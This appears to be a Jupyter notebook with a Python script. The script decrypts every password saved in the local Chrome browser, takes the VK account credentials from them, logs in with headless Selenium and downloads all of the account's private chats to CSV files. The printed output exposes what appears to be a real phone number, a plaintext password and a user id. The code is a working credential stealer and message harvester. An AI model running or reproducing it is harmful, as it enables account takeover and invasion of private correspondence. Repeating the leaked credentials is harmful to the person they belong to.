In [83]:
import os
from Crypto.Hash import SHA512
import sqlite3
import win32crypt
import shutil
import requests
import re
from time import sleep
from bs4 import BeautifulSoup
from pandas import DataFrame, concat
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.by import By
import json
import base64
from Cryptodome.Cipher import AES
from fake_useragent import UserAgent
from selenium.webdriver.common.keys import Keys
import lxml
import json
import pandas as pd
from datetime import datetime
from progress.bar import IncrementalBar

In [84]:
def get_master_key():
     with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r") as f:
         local_state = f.read()
         local_state = json.loads(local_state)
     master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
     master_key = master_key[5:]  # removing DPAPI
     master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
     return master_key

def decrypt_payload(cipher, payload):
     return cipher.decrypt(payload)

def generate_cipher(aes_key, iv):
     return AES.new(aes_key, AES.MODE_GCM, iv)

def decrypt_password(buff, master_key):
     try:
         iv = buff[3:15]
         payload = buff[15:]
         cipher = generate_cipher(master_key, iv)
         decrypted_pass = decrypt_payload(cipher, payload)
         decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
         return decrypted_pass
     except Exception as e:
         # print("Probably saved password from Chrome version older than v80\n")
         # print(str(e))
         return "Chrome < 80"
     

def Chrome(): 
   master_key = get_master_key()
   data_base = {}
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'): 
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') 
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins')
       login_data = cursor.fetchall()
       for url, user_name, pwd, in login_data:
           encrypted_password = pwd
           pwd = decrypt_password(encrypted_password, master_key)
           if pwd != '':
               data_base[url] = (user_name, pwd)
   return data_base


In [85]:
def create_driver(sgn):
    options = webdriver.ChromeOptions()
    if sgn:
        ua = UserAgent()
        us_ag = ua.random
        options.add_argument(f"user-agent={us_ag}") 
    options.add_experimental_option("excludeSwitches", ["enable-logging", "enable-automation", "load-extension", "--disable-extensions", "user-agent"])
    options.add_argument('--headless')
    service = Service(ChromeDriverManager().install())
    driver = webdriver.Chrome(options = options, 
                              service = service)
    return driver


def put_field(driver, teg, data, put):
    input = driver.find_element(teg, data)
    input.clear()
    input.send_keys(put)


def click_field(driver, teg, data):
    res = driver.find_element(teg, data).click()
    sleep(3)
    return res


def logging(driver, number, password):
    put_field(driver, By.ID, "index_email", number)
    click_field(driver, By.CLASS_NAME, "FlatButton--primary")
    click_field(driver, By.CSS_SELECTOR, "button.vkc__Bottom__switchToPassword")
    put_field(driver, By.NAME, "password", password)
    click_field(driver, By.CLASS_NAME, "vkuiButton--lvl-primary")


def authorize(url:str, number:str, password:str):
    driver = create_driver(False)
    driver.get(url)
    logging(driver, number, password)
    driver.save_screenshot("auth.png")
    user_id = driver.execute_script("return window.vk.id;")
    return driver, user_id

In [86]:

def parse_page(req):
    req_text = req.text
    json_str = json.loads(req_text[4:])
    res = json_str['payload'][1][1:][0]
    error = json_str['payload'][1][0].get('has_more')
    peer_ids = []
    minor_sort_id = 0
    for item in res.items():
        item = item[1]
        peer_id = item.get('peerId')
        peer_ids.append(peer_id)
        minor_sort_id = item.get('minor_sort_id')   
    return peer_ids, len(peer_ids), minor_sort_id, error
    
def parse_list_id(session):
    list_id = []
    url = 'https://vk.com/al_im.php'
    id = 0
    res = True
    while res:
        param = {
        'act': 'a_get_dialogs',
        'al': '1',
        'gid': '0',
        'im_v': '3',
        'is_layer': '0',
        'lang': 'en',
        'offset': '0',
        'tab': 'all',
        'start_message_id':id
        }
        req = session.post(url, params = param)
        sub_id, length, id, res = parse_page(req)
        list_id += sub_id
    return list_id

def parse_message_data(req, user_id, id):
    req_text = req.text
    json_str = json.loads(req_text[4:])
    payload = json_str['payload']
    res = payload[1][1]

    if res == []:
        return '', '', [], [], False, 0
    
    items = res.items()
    lst = list(items)
    length = 0
    chat = True if lst[0][1][5].get('from') else False
    mark = 'group' if chat else 'personaly'
    messages, ids, times = [], [], []

    for item in items:
        item = item[1]
        time = item[3]
        message_text = item[4]
        if chat:
            id_from = item[5]
            id = id_from.get('from')
        else:
            id_from = item[2]
            id = user_id if item[7] != 0 else id_from
        messages.append(message_text)
        ids.append(id)
        times.append((datetime.fromtimestamp(float(time))).strftime("%m/%d/%Y, %H:%M:%S"))
        length += 1
    return mark, times, ids, messages, True, length

def parse_message(session, user_id, id):
    list_messages = []
    mark = ''
    list_ids = []
    list_times = []
    url = 'https://vk.com/al_im.php?act=a_start'
    res = True
    length = 0
    while res:
        param = {
            'act': 'a_history',
            'al': '1',
            'gid':'0',
            'im_v': '3',
            'offset': length,
            'peer': id,
            'toend': '1',
            'whole': '0',
        }
        req = session.post(url, params = param)
        marks, times, ids, messages, res, d_length = parse_message_data(req, user_id, id)
        length += d_length
        list_ids += ids
        if marks:
            mark = marks
        list_messages += messages
        list_times += times
    df_message = pd.DataFrame({'id_sender':list_ids, 'message':list_messages, 'time':list_times})
    return df_message, mark


def parse_chats(driver, user_id, some = None):
    adr = 'Archive_'+ str(user_id)
    if not os.path.exists(adr):
        os.mkdir(adr)
    url = 'https://vk.com/im'
    driver.get(url)
    session = requests.Session()
    selenium_user_agent = driver.execute_script("return navigator.userAgent;")
    session.headers.update({"user-agent": selenium_user_agent})
    for cookie in driver.get_cookies():
            session.cookies.set(cookie['name'], cookie['value'], domain=cookie['domain'])
    list_id = parse_list_id(session)
    #list_id = [140877801, 467797122, 9013009, 314748064, 362298084]
    list_id = list_id[:some]
    #bar = IncrementalBar('Загрузка чатов...', max = len(list_id))

    for id in list_id:
        #bar.next()
        df_message, mark = parse_message(session, user_id, id)
        name_csv = os.path.join(adr + '/',  'messages_'+ mark + '_' + str(id) +'.csv') 
        df_message.to_csv(name_csv)
        print(' Содержимое чата id =', id, '\tуспешно сохранено')
    #bar.finish()
    return

if __name__ == '__main__':
    url = "https://vk.com/login"
    
    print('Получение данных...')
    d = Chrome()
    number, password = d['https://id.vk.com/auth']
    print('Логин и пароль успешно получены' + '\n',
          'Логин:', number + '\n',
          'Пароль:', password)
    
    print('Авторизация...')
    driver, user_id = authorize(url, number, password)
    print('Авторизация прошла успешно...' + '\n',
          'id пользователя = ', user_id)
    
    print('Получение содержимого чатов...')
    parse_chats(driver, user_id)
    print('Чаты получены')

Получение данных...
Логин и пароль успешно получены
 Логин: +7913 707-02-64
 Пароль: 8908915KK6153
Авторизация...
Авторизация прошла успешно...
 id пользователя =  366886440
Получение содержимого чатов...
Чаты получены
